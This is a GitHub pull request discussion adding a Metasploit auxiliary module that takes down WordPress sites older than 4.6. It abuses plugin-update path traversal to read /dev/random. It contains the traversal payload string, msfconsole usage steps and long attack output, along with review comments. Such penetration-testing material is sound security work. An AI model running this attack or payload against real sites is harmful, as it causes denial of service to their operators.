Add WordPress Directory Traversal DoS module
rapid7/metasploit-framework pull request #8323
Opened 2017-04-30 14:46 UTC by JulienPlas

This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).

## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/dos/http/wordpress_directory_traversal_dos.rb`
- [ ] `set RHOST <ip target site>`
- [ ] `set TARGETURI <WordPress path>`
- [ ] `set USERNAME <Valid Username>`
- [ ] `set PASSWORD <Valid Password>`
- [ ] `exploit`

 
## Scenarios

```
msf auxiliary(wordpress_directory_traversal_dos) > exploit

[*] Checking if user "test" exists...
[+] Username "test" is valid
[*] Executing requests 1 - 5...
[+] Finished executing requests 1 - 5
[*] Executing requests 6 - 10...
[+] Finished executing requests 6 - 10
...
[*] Executing requests 191 - 195...
[+] Finished executing requests 191 - 195
[*] Executing requests 196 - 200...
[+] Finished executing requests 196 - 200
[+] SUCCESS: /wordpress appears to be down
[*] Auxiliary module execution completed

2017-05-24 23:32 UTC, h00die requested changes
Overall looks very nicely coded.
Don't change it now, but next time submit the PR from a non-master branch.

I can test this in the next few days if you get the changes made

2017-05-24 23:32 UTC, h00die commented on modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
> +      'Description'     =>  %q{Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in WordPress before 4.6 allows remote attack
can you break this up to multiple lines so its easier to read similar to https://github.com/rapid7/metasploit-framework/pull/8422/files#diff-992718cb1437d7e3d005df7439f53f30R14

2017-05-24 23:32 UTC, h00die commented on modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
> +                  'plugin' => '../../../../../../../../../../dev/random'
I would make the depth configurable and set the default to 10

2017-05-24 23:35 UTC, h00die commented
Please also add documentation see https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation

2017-05-26 18:43 UTC, h00die commented
working for me
```
msf > use auxiliary/dos/http/wordpress_directory_traversal_dos 
msf auxiliary(wordpress_directory_traversal_dos) > set rhost 1.2.3.241
rhost => 1.2.3.241
msf auxiliary(wordpress_directory_traversal_dos) > set verbose true
verbose => true
msf auxiliary(wordpress_directory_traversal_dos) > set targeturi /wordpress
targeturi => /wordpress
msf auxiliary(wordpress_directory_traversal_dos) > set username subscriber
username => subscriber
msf auxiliary(wordpress_directory_traversal_dos) > set password subscriber
password => subscriber
msf auxiliary(wordpress_directory_traversal_dos) > run

[*] Checking if user "subscriber" exists...
[+] Username "subscriber" is valid
[!] No active DB -- Credential data will not be saved!
[*] Executing requests 1 - 5...
[+] Finished executing requests 1 - 5
[*] Executing requests 6 - 10...
[+] Finished executing requests 6 - 10
[*] Executing requests 11 - 15...
[+] Finished executing requests 11 - 15
[*] Executing requests 16 - 20...
[+] Finished executing requests 16 - 20
[*] Executing requests 21 - 25...
[+] Finished executing requests 21 - 25
[*] Executing requests 26 - 30...
[+] Finished executing requests 26 - 30
[*] Executing requests 31 - 35...
[+] Finished executing requests 31 - 35
[*] Executing requests 36 - 40...
[+] Finished executing requests 36 - 40
[*] Executing requests 41 - 45...
[+] Finished executing requests 41 - 45
[*] Executing requests 46 - 50...
[+] Finished executing requests 46 - 50
[*] Executing requests 51 - 55...
[+] Finished executing requests 51 - 55
[*] Executing requests 56 - 60...
[+] Finished executing requests 56 - 60
[*] Executing requests 61 - 65...
[+] Finished executing requests 61 - 65
[*] Executing requests 66 - 70...
[+] Finished executing requests 66 - 70
[*] Executing requests 71 - 75...
[+] Finished executing requests 71 - 75
[*] Executing requests 76 - 80...
[+] Finished executing requests 76 - 80
[*] Executing requests 81 - 85...
[+] Finished executing requests 81 - 85
[*] Executing requests 86 - 90...
[+] Finished executing requests 86 - 90
[*] Executing requests 91 - 95...
[+] Finished executing requests 91 - 95
[*] Executing requests 96 - 100...
[+] Finished executing requests 96 - 100
[*] Executing requests 101 - 105...
[+] Finished executing requests 101 - 105
[*] Executing requests 106 - 110...
[+] Finished executing requests 106 - 110
[*] Executing requests 111 - 115...
[+] Finished executing requests 111 - 115
[*] Executing requests 116 - 120...
[+] Finished executing requests 116 - 120
[*] Executing requests 121 - 125...
[+] Finished executing requests 121 - 125
[*] Executing requests 126 - 130...
[+] Finished executing requests 126 - 130
[*] Executing requests 131 - 135...
[+] Finished executing requests 131 - 135
[*] Executing requests 136 - 140...
[+] Finished executing requests 136 - 140
[*] Executing requests 141 - 145...
[+] Finished executing requests 141 - 145
[*] Executing requests 146 - 150...
[+] Finished executing requests 146 - 150
[*] Executing requests 151 - 155...
[+] Finished executing requests 151 - 155
[*] Executing requests 156 - 160...
[+] Finished executing requests 156 - 160
[*] Executing requests 161 - 165...
[+] Finished executing requests 161 - 165
[*] Executing requests 166 - 170...
[+] Finished executing requests 166 - 170
[*] Executing requests 171 - 175...
[+] Finished executing requests 171 - 175
[*] Executing requests 176 - 180...
[+] Finished executing requests 176 - 180
[*] Executing requests 181 - 185...
[+] Finished executing requests 181 - 185
[*] Executing requests 186 - 190...
[+] Finished executing requests 186 - 190
[*] Executing requests 191 - 195...
[+] Finished executing requests 191 - 195
[*] Executing requests 196 - 200...
[+] Finished executing requests 196 - 200
[+] SUCCESS: /wordpress appears to be down
[*] Auxiliary module execution completed

```

then manually confirmed the site is down w/ a different computer that it was hosed, and it was.

2017-05-26 19:06 UTC, h00die commented
setting depth to 1 didn't take down the site (as expected)

2017-05-26 19:31 UTC, h00die requested changes
Last set of changes to the docs and i'm happy to get this merged, functionality is all there and verified to be working.

2017-05-26 19:31 UTC, h00die commented on documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
> +This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated
```
[wp_ajax_update_plugin](https://core.trac.wordpress.org/changeset/38168)
```

2017-05-26 19:31 UTC, h00die commented on documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
> +This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated
This section is missing its header:

```
## Vulnerable Application
```

2017-05-26 19:31 UTC, h00die commented on documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
> +This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated
add a link to the changeset, why not!

2017-05-26 19:31 UTC, h00die commented on documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
> +This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated
Add a link to the vuln app:
```
[Wordpress 4.5.9](https://wordpress.org/wordpress-4.5.9.tar.gz) and others can be downloaded from the [archive](https://wordpress.org/download/release-archive/)
```

2017-05-26 19:31 UTC, h00die commented on documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
> +## Verification
Verification **Steps**

2017-05-26 19:31 UTC, h00die commented on documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
> +## Scenarios
Add a 3rd level heading with details of what was tested here which can help for debugging it in 5yrs or so if someone had to come back and look.
```
### Wordpress 4.5.9 on Ubuntu 16.04.02
```

2017-05-29 12:00 UTC, merged

2017-05-29 12:01 UTC, h00die commented
Fixed up the markdown formatting https://github.com/rapid7/metasploit-framework/commit/eb87185e259f116143e4c4ee925b97fa431c0c62

2017-05-29 12:01 UTC, h00die commented
@JulienPlas Thanks for the submission!

2017-05-29 12:02 UTC, h00die commented
# Release Notes
This pull adds a DoS against Wordpress < 4.6 utilizing a CSRF to `/dev/random`

2017-08-03 19:35 UTC, selselmen commented on documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md
> +## Scenarios
hey what will ı write to targeturi can you help me please